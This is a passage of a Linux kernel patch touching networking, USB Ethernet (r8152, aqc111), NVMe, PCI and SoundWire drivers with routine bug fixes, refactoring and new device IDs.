+@@ -468,7 +468,7 @@ static int qlcnic_tx_pkt(struct qlcnic_adapter *adapter,
+ 	u32 producer = tx_ring->producer;
+ 
+ 	if (protocol == ETH_P_8021Q) {
+-		vh = (struct vlan_ethhdr *)skb->data;
++		vh = skb_vlan_eth_hdr(skb);
+ 		flags = QLCNIC_FLAGS_VLAN_TAGGED;
+ 		vlan_tci = ntohs(vh->h_vlan_TCI);
+ 		protocol = ntohs(vh->h_vlan_encapsulated_proto);
+diff --git a/drivers/net/ethernet/qualcomm/qca_debug.c b/drivers/net/ethernet/qualcomm/qca_debug.c
+index f62c39544e086..a739c06ede4e7 100644
+--- a/drivers/net/ethernet/qualcomm/qca_debug.c
++++ b/drivers/net/ethernet/qualcomm/qca_debug.c
+@@ -30,6 +30,8 @@
+ 
+ #define QCASPI_MAX_REGS 0x20
+ 
++#define QCASPI_RX_MAX_FRAMES 4
++
+ static const u16 qcaspi_spi_regs[] = {
+ 	SPI_REG_BFR_SIZE,
+ 	SPI_REG_WRBUF_SPC_AVA,
+@@ -252,9 +254,9 @@ qcaspi_get_ringparam(struct net_device *dev, struct ethtool_ringparam *ring,
+ {
+ 	struct qcaspi *qca = netdev_priv(dev);
+ 
+-	ring->rx_max_pending = 4;
++	ring->rx_max_pending = QCASPI_RX_MAX_FRAMES;
+ 	ring->tx_max_pending = TX_RING_MAX_LEN;
+-	ring->rx_pending = 4;
++	ring->rx_pending = QCASPI_RX_MAX_FRAMES;
+ 	ring->tx_pending = qca->txr.count;
+ }
+ 
+@@ -263,22 +265,21 @@ qcaspi_set_ringparam(struct net_device *dev, struct ethtool_ringparam *ring,
+ 		     struct kernel_ethtool_ringparam *kernel_ring,
+ 		     struct netlink_ext_ack *extack)
+ {
+-	const struct net_device_ops *ops = dev->netdev_ops;
+ 	struct qcaspi *qca = netdev_priv(dev);
+ 
+-	if ((ring->rx_pending) ||
++	if (ring->rx_pending != QCASPI_RX_MAX_FRAMES ||
+ 	    (ring->rx_mini_pending) ||
+ 	    (ring->rx_jumbo_pending))
+ 		return -EINVAL;
+ 
+-	if (netif_running(dev))
+-		ops->ndo_stop(dev);
++	if (qca->spi_thread)
++		kthread_park(qca->spi_thread);
+ 
+ 	qca->txr.count = max_t(u32, ring->tx_pending, TX_RING_MIN_LEN);
+ 	qca->txr.count = min_t(u16, qca->txr.count, TX_RING_MAX_LEN);
+ 
+-	if (netif_running(dev))
+-		ops->ndo_open(dev);
++	if (qca->spi_thread)
++		kthread_unpark(qca->spi_thread);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/ethernet/qualcomm/qca_spi.c b/drivers/net/ethernet/qualcomm/qca_spi.c
+index 4a1b94e5a8ea9..82f5173a2cfd5 100644
+--- a/drivers/net/ethernet/qualcomm/qca_spi.c
++++ b/drivers/net/ethernet/qualcomm/qca_spi.c
+@@ -581,6 +581,18 @@ qcaspi_spi_thread(void *data)
+ 	netdev_info(qca->net_dev, "SPI thread created\n");
+ 	while (!kthread_should_stop()) {
+ 		set_current_state(TASK_INTERRUPTIBLE);
++		if (kthread_should_park()) {
++			netif_tx_disable(qca->net_dev);
++			netif_carrier_off(qca->net_dev);
++			qcaspi_flush_tx_ring(qca);
++			kthread_parkme();
++			if (qca->sync == QCASPI_SYNC_READY) {
++				netif_carrier_on(qca->net_dev);
++				netif_wake_queue(qca->net_dev);
++			}
++			continue;
++		}
++
+ 		if ((qca->intr_req == qca->intr_svc) &&
+ 		    !qca->txr.skb[qca->txr.head])
+ 			schedule();
+@@ -609,11 +621,17 @@ qcaspi_spi_thread(void *data)
+ 			if (intr_cause & SPI_INT_CPU_ON) {
+ 				qcaspi_qca7k_sync(qca, QCASPI_EVENT_CPUON);
+ 
++				/* Frame decoding in progress */
++				if (qca->frm_handle.state != qca->frm_handle.init)
++					qca->net_dev->stats.rx_dropped++;
++
++				qcafrm_fsm_init_spi(&qca->frm_handle);
++				qca->stats.device_reset++;
++
+ 				/* not synced. */
+ 				if (qca->sync != QCASPI_SYNC_READY)
+ 					continue;
+ 
+-				qca->stats.device_reset++;
+ 				netif_wake_queue(qca->net_dev);
+ 				netif_carrier_on(qca->net_dev);
+ 			}
+diff --git a/drivers/net/ethernet/sfc/tx_tso.c b/drivers/net/ethernet/sfc/tx_tso.c
+index 898e5c61d9086..d381d8164f07c 100644
+--- a/drivers/net/ethernet/sfc/tx_tso.c
++++ b/drivers/net/ethernet/sfc/tx_tso.c
+@@ -147,7 +147,7 @@ static __be16 efx_tso_check_protocol(struct sk_buff *skb)
+ 	EFX_WARN_ON_ONCE_PARANOID(((struct ethhdr *)skb->data)->h_proto !=
+ 				  protocol);
+ 	if (protocol == htons(ETH_P_8021Q)) {
+-		struct vlan_ethhdr *veh = (struct vlan_ethhdr *)skb->data;
++		struct vlan_ethhdr *veh = skb_vlan_eth_hdr(skb);
+ 
+ 		protocol = veh->h_vlan_encapsulated_proto;
+ 	}
+diff --git a/drivers/net/ethernet/stmicro/stmmac/Kconfig b/drivers/net/ethernet/stmicro/stmmac/Kconfig
+index 31ff351740342..58091ee2bfe60 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/Kconfig
++++ b/drivers/net/ethernet/stmicro/stmmac/Kconfig
+@@ -256,7 +256,7 @@ config DWMAC_INTEL
+ config DWMAC_LOONGSON
+ 	tristate "Loongson PCI DWMAC support"
+ 	default MACH_LOONGSON64
+-	depends on STMMAC_ETH && PCI
++	depends on (MACH_LOONGSON64 || COMPILE_TEST) && STMMAC_ETH && PCI
+ 	depends on COMMON_CLK
+ 	help
+ 	  This selects the LOONGSON PCI bus support for the stmmac driver,
+diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c
+index a25c187d31853..49c7aa86faaa8 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c
++++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-loongson.c
+@@ -68,17 +68,15 @@ static int loongson_dwmac_probe(struct pci_dev *pdev, const struct pci_device_id
+ 	if (!plat)
+ 		return -ENOMEM;
+ 
++	plat->mdio_bus_data = devm_kzalloc(&pdev->dev,
++					   sizeof(*plat->mdio_bus_data),
++					   GFP_KERNEL);
++	if (!plat->mdio_bus_data)
++		return -ENOMEM;
++
+ 	plat->mdio_node = of_get_child_by_name(np, "mdio");
+ 	if (plat->mdio_node) {
+ 		dev_info(&pdev->dev, "Found MDIO subnode\n");
+-
+-		plat->mdio_bus_data = devm_kzalloc(&pdev->dev,
+-						   sizeof(*plat->mdio_bus_data),
+-						   GFP_KERNEL);
+-		if (!plat->mdio_bus_data) {
+-			ret = -ENOMEM;
+-			goto err_put_node;
+-		}
+ 		plat->mdio_bus_data->needs_reset = true;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 69aac8ed84f67..deb6e95a1bca6 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -4566,13 +4566,10 @@ dma_map_err:
+ 
+ static void stmmac_rx_vlan(struct net_device *dev, struct sk_buff *skb)
+ {
+-	struct vlan_ethhdr *veth;
+-	__be16 vlan_proto;
++	struct vlan_ethhdr *veth = skb_vlan_eth_hdr(skb);
++	__be16 vlan_proto = veth->h_vlan_proto;
+ 	u16 vlanid;
+ 
+-	veth = (struct vlan_ethhdr *)skb->data;
+-	vlan_proto = veth->h_vlan_proto;
+-
+ 	if ((vlan_proto == htons(ETH_P_8021Q) &&
+ 	     dev->features & NETIF_F_HW_VLAN_CTAG_RX) ||
+ 	    (vlan_proto == htons(ETH_P_8021AD) &&
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_mdio.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_mdio.c
+index 5f177ea807258..379fc887ddf46 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_mdio.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_mdio.c
+@@ -483,7 +483,11 @@ int stmmac_mdio_register(struct net_device *ndev)
+ 	new_bus->parent = priv->device;
+ 
+ 	err = of_mdiobus_register(new_bus, mdio_node);
+-	if (err != 0) {
++	if (err == -ENODEV) {
++		err = 0;
++		dev_info(dev, "MDIO bus is disabled\n");
++		goto bus_register_fail;
++	} else if (err) {
+ 		dev_err_probe(dev, err, "Cannot register the MDIO bus\n");
+ 		goto bus_register_fail;
+ 	}
+diff --git a/drivers/net/team/team.c b/drivers/net/team/team.c
+index 556b2d1cd2aca..293eaf6b3ec9e 100644
+--- a/drivers/net/team/team.c
++++ b/drivers/net/team/team.c
+@@ -285,8 +285,10 @@ static int __team_options_register(struct team *team,
+ 	return 0;
+ 
+ inst_rollback:
+-	for (i--; i >= 0; i--)
++	for (i--; i >= 0; i--) {
+ 		__team_option_inst_del_option(team, dst_opts[i]);
++		list_del(&dst_opts[i]->list);
++	}
+ 
+ 	i = option_count;
+ alloc_rollback:
+diff --git a/drivers/net/usb/aqc111.c b/drivers/net/usb/aqc111.c
+index a017e9de2119d..7b8afa589a53c 100644
+--- a/drivers/net/usb/aqc111.c
++++ b/drivers/net/usb/aqc111.c
+@@ -1079,17 +1079,17 @@ static int aqc111_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 	u16 pkt_count = 0;
+ 	u64 desc_hdr = 0;
+ 	u16 vlan_tag = 0;
+-	u32 skb_len = 0;
++	u32 skb_len;
+ 
+ 	if (!skb)
+ 		goto err;
+ 
+-	if (skb->len == 0)
++	skb_len = skb->len;
++	if (skb_len < sizeof(desc_hdr))
+ 		goto err;
+ 
+-	skb_len = skb->len;
+ 	/* RX Descriptor Header */
+-	skb_trim(skb, skb->len - sizeof(desc_hdr));
++	skb_trim(skb, skb_len - sizeof(desc_hdr));
+ 	desc_hdr = le64_to_cpup((u64 *)skb_tail_pointer(skb));
+ 
+ 	/* Check these packets */
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index 4fb981b8732ef..2d82481d34e6b 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1288,6 +1288,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_FIXED_INTF(0x19d2, 0x0168, 4)},
+ 	{QMI_FIXED_INTF(0x19d2, 0x0176, 3)},
+ 	{QMI_FIXED_INTF(0x19d2, 0x0178, 3)},
++	{QMI_FIXED_INTF(0x19d2, 0x0189, 4)},    /* ZTE MF290 */
+ 	{QMI_FIXED_INTF(0x19d2, 0x0191, 4)},	/* ZTE EuFi890 */
+ 	{QMI_FIXED_INTF(0x19d2, 0x0199, 1)},	/* ZTE MF820S */
+ 	{QMI_FIXED_INTF(0x19d2, 0x0200, 1)},
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index 4d833781294a4..958a02b19554d 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -8288,43 +8288,6 @@ static bool rtl_check_vendor_ok(struct usb_interface *intf)
+ 	return true;
+ }
+ 
+-static bool rtl_vendor_mode(struct usb_interface *intf)
+-{
+-	struct usb_host_interface *alt = intf->cur_altsetting;
+-	struct usb_device *udev;
+-	struct usb_host_config *c;
+-	int i, num_configs;
+-
+-	if (alt->desc.bInterfaceClass == USB_CLASS_VENDOR_SPEC)
+-		return rtl_check_vendor_ok(intf);
+-
+-	/* The vendor mode is not always config #1, so to find it out. */
+-	udev = interface_to_usbdev(intf);
+-	c = udev->config;
+-	num_configs = udev->descriptor.bNumConfigurations;
+-	if (num_configs < 2)
+-		return false;
+-
+-	for (i = 0; i < num_configs; (i++, c++)) {
+-		struct usb_interface_descriptor	*desc = NULL;
+-
+-		if (c->desc.bNumInterfaces > 0)
+-			desc = &c->intf_cache[0]->altsetting->desc;
+-		else
+-			continue;
+-
+-		if (desc->bInterfaceClass == USB_CLASS_VENDOR_SPEC) {
+-			usb_driver_set_configuration(udev, c->desc.bConfigurationValue);
+-			break;
+-		}
+-	}
+-
+-	if (i == num_configs)
+-		dev_err(&intf->dev, "Unexpected Device\n");
+-
+-	return false;
+-}
+-
+ static int rtl8152_pre_reset(struct usb_interface *intf)
+ {
+ 	struct r8152 *tp = usb_get_intfdata(intf);
+@@ -9556,9 +9519,8 @@ static int rtl_fw_init(struct r8152 *tp)
+ 	return 0;
+ }
+ 
+-u8 rtl8152_get_version(struct usb_interface *intf)
++static u8 __rtl_get_hw_ver(struct usb_device *udev)
+ {
+-	struct usb_device *udev = interface_to_usbdev(intf);
+ 	u32 ocp_data = 0;
+ 	__le32 *tmp;
+ 	u8 version;
+@@ -9628,10 +9590,19 @@ u8 rtl8152_get_version(struct usb_interface *intf)
+ 		break;
+ 	default:
+ 		version = RTL_VER_UNKNOWN;
+-		dev_info(&intf->dev, "Unknown version 0x%04x\n", ocp_data);
++		dev_info(&udev->dev, "Unknown version 0x%04x\n", ocp_data);
+ 		break;
+ 	}
+ 
++	return version;
++}
++
++u8 rtl8152_get_version(struct usb_interface *intf)
++{
++	u8 version;
++
++	version = __rtl_get_hw_ver(interface_to_usbdev(intf));
++
+ 	dev_dbg(&intf->dev, "Detected version 0x%04x\n", version);
+ 
+ 	return version;
+@@ -9675,7 +9646,10 @@ static int rtl8152_probe(struct usb_interface *intf,
+ 	if (version == RTL_VER_UNKNOWN)
+ 		return -ENODEV;
+ 
+-	if (!rtl_vendor_mode(intf))
++	if (intf->cur_altsetting->desc.bInterfaceClass != USB_CLASS_VENDOR_SPEC)
++		return -ENODEV;
++
++	if (!rtl_check_vendor_ok(intf))
+ 		return -ENODEV;
+ 
+ 	usb_reset_device(udev);
+@@ -9875,43 +9849,37 @@ static void rtl8152_disconnect(struct usb_interface *intf)
+ 	}
+ }
+ 
+-#define REALTEK_USB_DEVICE(vend, prod)	{ \
+-	USB_DEVICE_INTERFACE_CLASS(vend, prod, USB_CLASS_VENDOR_SPEC), \
+-}, \
+-{ \
+-	USB_DEVICE_AND_INTERFACE_INFO(vend, prod, USB_CLASS_COMM, \
+-			USB_CDC_SUBCLASS_ETHERNET, USB_CDC_PROTO_NONE), \
+-}
+-
+ /* table of devices that work with this driver */
+ static const struct usb_device_id rtl8152_table[] = {
+ 	/* Realtek */
+-	REALTEK_USB_DEVICE(VENDOR_ID_REALTEK, 0x8050),
+-	REALTEK_USB_DEVICE(VENDOR_ID_REALTEK, 0x8053),
+-	REALTEK_USB_DEVICE(VENDOR_ID_REALTEK, 0x8152),
+-	REALTEK_USB_DEVICE(VENDOR_ID_REALTEK, 0x8153),
+-	REALTEK_USB_DEVICE(VENDOR_ID_REALTEK, 0x8155),
+-	REALTEK_USB_DEVICE(VENDOR_ID_REALTEK, 0x8156),
++	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x8050) },
++	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x8053) },
++	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x8152) },
++	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x8153) },
++	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x8155) },
++	{ USB_DEVICE(VENDOR_ID_REALTEK, 0x8156) },
+ 
+ 	/* Microsoft */
+-	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x07ab),
+-	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x07c6),
+-	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x0927),
+-	REALTEK_USB_DEVICE(VENDOR_ID_MICROSOFT, 0x0c5e),
+-	REALTEK_USB_DEVICE(VENDOR_ID_SAMSUNG, 0xa101),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x304f),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x3054),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x3062),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x3069),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x3082),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x7205),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x720c),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x7214),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0x721e),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LENOVO,  0xa387),
+-	REALTEK_USB_DEVICE(VENDOR_ID_LINKSYS, 0x0041),
+-	REALTEK_USB_DEVICE(VENDOR_ID_NVIDIA,  0x09ff),
+-	REALTEK_USB_DEVICE(VENDOR_ID_TPLINK,  0x0601),
++	{ USB_DEVICE(VENDOR_ID_MICROSOFT, 0x07ab) },
++	{ USB_DEVICE(VENDOR_ID_MICROSOFT, 0x07c6) },
++	{ USB_DEVICE(VENDOR_ID_MICROSOFT, 0x0927) },
++	{ USB_DEVICE(VENDOR_ID_MICROSOFT, 0x0c5e) },
++	{ USB_DEVICE(VENDOR_ID_SAMSUNG, 0xa101) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x304f) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x3054) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x3062) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x3069) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x3082) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x7205) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x720c) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x7214) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0x721e) },
++	{ USB_DEVICE(VENDOR_ID_LENOVO,  0xa387) },
++	{ USB_DEVICE(VENDOR_ID_LINKSYS, 0x0041) },
++	{ USB_DEVICE(VENDOR_ID_NVIDIA,  0x09ff) },
++	{ USB_DEVICE(VENDOR_ID_TPLINK,  0x0601) },
++	{ USB_DEVICE(VENDOR_ID_DLINK,   0xb301) },
++	{ USB_DEVICE(VENDOR_ID_ASUS,    0x1976) },
+ 	{}
+ };
+ 
+@@ -9931,7 +9899,68 @@ static struct usb_driver rtl8152_driver = {
+ 	.disable_hub_initiated_lpm = 1,
+ };
+ 
+-module_usb_driver(rtl8152_driver);
++static int rtl8152_cfgselector_probe(struct usb_device *udev)
++{
++	struct usb_host_config *c;
++	int i, num_configs;
++
++	/* Switch the device to vendor mode, if and only if the vendor mode
++	 * driver supports it.
++	 */
++	if (__rtl_get_hw_ver(udev) == RTL_VER_UNKNOWN)
++		return 0;
++
++	/* The vendor mode is not always config #1, so to find it out. */
++	c = udev->config;
++	num_configs = udev->descriptor.bNumConfigurations;
++	for (i = 0; i < num_configs; (i++, c++)) {
++		struct usb_interface_descriptor	*desc = NULL;
++
++		if (!c->desc.bNumInterfaces)
++			continue;
++		desc = &c->intf_cache[0]->altsetting->desc;
++		if (desc->bInterfaceClass == USB_CLASS_VENDOR_SPEC)
++			break;
++	}
++
++	if (i == num_configs)
++		return -ENODEV;
++
++	if (usb_set_configuration(udev, c->desc.bConfigurationValue)) {
++		dev_err(&udev->dev, "Failed to set configuration %d\n",
++			c->desc.bConfigurationValue);
++		return -ENODEV;
++	}
++
++	return 0;
++}
++
++static struct usb_device_driver rtl8152_cfgselector_driver = {
++	.name =		MODULENAME "-cfgselector",
++	.probe =	rtl8152_cfgselector_probe,
++	.id_table =	rtl8152_table,
++	.generic_subclass = 1,
++	.supports_autosuspend = 1,
++};
++
++static int __init rtl8152_driver_init(void)
++{
++	int ret;
++
++	ret = usb_register_device_driver(&rtl8152_cfgselector_driver, THIS_MODULE);
++	if (ret)
++		return ret;
++	return usb_register(&rtl8152_driver);
++}
++
++static void __exit rtl8152_driver_exit(void)
++{
++	usb_deregister(&rtl8152_driver);
++	usb_deregister_device_driver(&rtl8152_cfgselector_driver);
++}
++
++module_init(rtl8152_driver_init);
++module_exit(rtl8152_driver_exit);
+ 
+ MODULE_AUTHOR(DRIVER_AUTHOR);
+ MODULE_DESCRIPTION(DRIVER_DESC);
+diff --git a/drivers/nvme/host/auth.c b/drivers/nvme/host/auth.c
+index 9dfd3d0293054..69aef668f1056 100644
+--- a/drivers/nvme/host/auth.c
++++ b/drivers/nvme/host/auth.c
+@@ -834,6 +834,8 @@ static void nvme_queue_auth_work(struct work_struct *work)
+ 	}
+ 
+ fail2:
++	if (chap->status == 0)
++		chap->status = NVME_AUTH_DHCHAP_FAILURE_FAILED;
+ 	dev_dbg(ctrl->device, "%s: qid %d send failure2, status %x\n",
+ 		__func__, chap->qid, chap->status);
+ 	tl = nvme_auth_set_dhchap_failure2_data(ctrl, chap);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 5b156c5bc04a5..eb7c87b344b8f 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -1845,16 +1845,18 @@ set_pi:
+ 	return ret;
+ }
+ 
+-static void nvme_configure_metadata(struct nvme_ns *ns, struct nvme_id_ns *id)
++static int nvme_configure_metadata(struct nvme_ns *ns, struct nvme_id_ns *id)
+ {
+ 	struct nvme_ctrl *ctrl = ns->ctrl;
++	int ret;
+ 
+-	if (nvme_init_ms(ns, id))
+-		return;
++	ret = nvme_init_ms(ns, id);
++	if (ret)
++		return ret;
+ 
+ 	ns->features &= ~(NVME_NS_METADATA_SUPPORTED | NVME_NS_EXT_LBAS);
+ 	if (!ns->ms || !(ctrl->ops->flags & NVME_F_METADATA_SUPPORTED))
+-		return;
++		return 0;
+ 
+ 	if (ctrl->ops->flags & NVME_F_FABRICS) {
+ 		/*
+@@ -1863,7 +1865,7 @@ static void nvme_configure_metadata(struct nvme_ns *ns, struct nvme_id_ns *id)
+ 		 * remap the separate metadata buffer from the block layer.
+ 		 */
+ 		if (WARN_ON_ONCE(!(id->flbas & NVME_NS_FLBAS_META_EXT)))
+-			return;
++			return 0;
+ 
+ 		ns->features |= NVME_NS_EXT_LBAS;
+ 
+@@ -1890,6 +1892,7 @@ static void nvme_configure_metadata(struct nvme_ns *ns, struct nvme_id_ns *id)
+ 		else
+ 			ns->features |= NVME_NS_METADATA_SUPPORTED;
+ 	}
++	return 0;
+ }
+ 
+ static void nvme_set_queue_limits(struct nvme_ctrl *ctrl,
+@@ -2070,7 +2073,11 @@ static int nvme_update_ns_info_block(struct nvme_ns *ns,
+ 	ns->lba_shift = id->lbaf[lbaf].ds;
+ 	nvme_set_queue_limits(ns->ctrl, ns->queue);
+ 
+-	nvme_configure_metadata(ns, id);
++	ret = nvme_configure_metadata(ns, id);
++	if (ret < 0) {
++		blk_mq_unfreeze_queue(ns->disk->queue);
++		goto out;
++	}
+ 	nvme_set_chunk_sectors(ns, id);
+ 	nvme_update_disk_info(ns->disk, ns, id);
+ 
+diff --git a/drivers/pci/controller/pci-loongson.c b/drivers/pci/controller/pci-loongson.c
+index fe0f732f6e434..a860f25473df6 100644
+--- a/drivers/pci/controller/pci-loongson.c
++++ b/drivers/pci/controller/pci-loongson.c
+@@ -80,13 +80,49 @@ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_LOONGSON,
+ 			DEV_LS7A_LPC, system_bus_quirk);
+ 
++/*
++ * Some Loongson PCIe ports have hardware limitations on their Maximum Read
++ * Request Size. They can't handle anything larger than this.  Sane
++ * firmware will set proper MRRS at boot, so we only need no_inc_mrrs for
++ * bridges. However, some MIPS Loongson firmware doesn't set MRRS properly,
++ * so we have to enforce maximum safe MRRS, which is 256 bytes.
++ */
++#ifdef CONFIG_MIPS
++static void loongson_set_min_mrrs_quirk(struct pci_dev *pdev)
++{
++	struct pci_bus *bus = pdev->bus;
++	struct pci_dev *bridge;
++	static const struct pci_device_id bridge_devids[] = {
++		{ PCI_VDEVICE(LOONGSON, DEV_LS2K_PCIE_PORT0) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT0) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT1) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT2) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT3) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT4) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT5) },
++		{ PCI_VDEVICE(LOONGSON, DEV_LS7A_PCIE_PORT6) },
++		{ 0, },
++	};
++
++	/* look for the matching bridge */
++	while (!pci_is_root_bus(bus)) {
++		bridge = bus->self;
++		bus = bus->parent;
++
++		if (pci_match_id(bridge_devids, bridge)) {
++			if (pcie_get_readrq(pdev) > 256) {
++				pci_info(pdev, "limiting MRRS to 256\n");
++				pcie_set_readrq(pdev, 256);
++			}
++			break;
++		}
++	}
++}
++DECLARE_PCI_FIXUP_ENABLE(PCI_ANY_ID, PCI_ANY_ID, loongson_set_min_mrrs_quirk);
++#endif
++
+ static void loongson_mrrs_quirk(struct pci_dev *pdev)
+ {
+-	/*
+-	 * Some Loongson PCIe ports have h/w limitations of maximum read
+-	 * request size. They can't handle anything larger than this. So
+-	 * force this limit on any devices attached under these ports.
+-	 */
+ 	struct pci_host_bridge *bridge = pci_find_host_bridge(pdev->bus);
+ 
+ 	bridge->no_inc_mrrs = 1;
+diff --git a/drivers/pci/hotplug/acpiphp_glue.c b/drivers/pci/hotplug/acpiphp_glue.c
+index ea0195337bab9..6efa3d8db9a56 100644
+--- a/drivers/pci/hotplug/acpiphp_glue.c
++++ b/drivers/pci/hotplug/acpiphp_glue.c
+@@ -504,15 +504,12 @@ static void enable_slot(struct acpiphp_slot *slot, bool bridge)
+ 				if (pass && dev->subordinate) {
+ 					check_hotplug_bridge(slot, dev);
+ 					pcibios_resource_survey_bus(dev->subordinate);
+-					if (pci_is_root_bus(bus))
+-						__pci_bus_size_bridges(dev->subordinate, &add_list);
++					__pci_bus_size_bridges(dev->subordinate,
++							       &add_list);
+ 				}
+ 			}
+ 		}
+-		if (pci_is_root_bus(bus))
+-			__pci_bus_assign_resources(bus, &add_list, NULL);
+-		else
+-			pci_assign_unassigned_bridge_resources(bus->self);
++		__pci_bus_assign_resources(bus, &add_list, NULL);
+ 	}
+ 
+ 	acpiphp_sanitize_bus(bus);
+diff --git a/drivers/platform/x86/intel/telemetry/core.c b/drivers/platform/x86/intel/telemetry/core.c
+index fdf55b5d69480..e4be40f73eebf 100644
+--- a/drivers/platform/x86/intel/telemetry/core.c
++++ b/drivers/platform/x86/intel/telemetry/core.c
+@@ -102,7 +102,7 @@ static const struct telemetry_core_ops telm_defpltops = {
+ /**
+  * telemetry_update_events() - Update telemetry Configuration
+  * @pss_evtconfig: PSS related config. No change if num_evts = 0.
+- * @pss_evtconfig: IOSS related config. No change if num_evts = 0.
++ * @ioss_evtconfig: IOSS related config. No change if num_evts = 0.
+  *
+  * This API updates the IOSS & PSS Telemetry configuration. Old config
+  * is overwritten. Call telemetry_reset_events when logging is over
+@@ -176,7 +176,7 @@ EXPORT_SYMBOL_GPL(telemetry_reset_events);
+ /**
+  * telemetry_get_eventconfig() - Returns the pss and ioss events enabled
+  * @pss_evtconfig: Pointer to PSS related configuration.
+- * @pss_evtconfig: Pointer to IOSS related configuration.
++ * @ioss_evtconfig: Pointer to IOSS related configuration.
+  * @pss_len:	   Number of u32 elements allocated for pss_evtconfig array
+  * @ioss_len:	   Number of u32 elements allocated for ioss_evtconfig array
+  *
+diff --git a/drivers/soundwire/stream.c b/drivers/soundwire/stream.c
+index b10ea69a638e1..2624441d2fa92 100644
+--- a/drivers/soundwire/stream.c
++++ b/drivers/soundwire/stream.c
+@@ -744,14 +744,15 @@ error_1:
+  * sdw_ml_sync_bank_switch: Multilink register bank switch
+  *
+  * @bus: SDW bus instance
++ * @multi_link: whether this is a multi-link stream with hardware-based sync
+  *
+  * Caller function should free the buffers on error
+  */
+-static int sdw_ml_sync_bank_switch(struct sdw_bus *bus)
++static int sdw_ml_sync_bank_switch(struct sdw_bus *bus, bool multi_link)
+ {
+ 	unsigned long time_left;
+ 
+-	if (!bus->multi_link)
++	if (!multi_link)
+ 		return 0;
+ 
+ 	/* Wait for completion of transfer */
+@@ -848,7 +849,7 @@ static int do_bank_switch(struct sdw_stream_runtime *stream)
+ 			bus->bank_switch_timeout = DEFAULT_BANK_SWITCH_TIMEOUT;
+ 
+ 		/* Check if bank switch was successful */
+-		ret = sdw_ml_sync_bank_switch(bus);
++		ret = sdw_ml_sync_bank_switch(bus, multi_link);
+ 		if (ret < 0) {
+ 			dev_err(bus->dev,
+ 				"multi link bank switch failed: %d\n", ret);
+diff --git a/drivers/staging/gdm724x/gdm_lte.c b/drivers/staging/gdm724x/gdm_lte.c
+index 671ee8843c889..5703a9ddb6d0d 100644
+--- a/drivers/staging/gdm724x/gdm_lte.c
++++ b/drivers/staging/gdm724x/gdm_lte.c
+@@ -349,7 +349,7 @@ static s32 gdm_lte_tx_nic_type(struct net_device *dev, struct sk_buff *skb)
+ 	/* Get ethernet protocol */
+ 	eth = (struct ethhdr *)skb->data;
+ 	if (ntohs(eth->h_proto) == ETH_P_8021Q) {
+-		vlan_eth = (struct vlan_ethhdr *)skb->data;
++		vlan_eth = skb_vlan_eth_hdr(skb);
+ 		mac_proto = ntohs(vlan_eth->h_vlan_encapsulated_proto);
+ 		network_data = skb->data + VLAN_ETH_HLEN;
+ 		nic_type |= NIC_TYPE_F_VLAN;
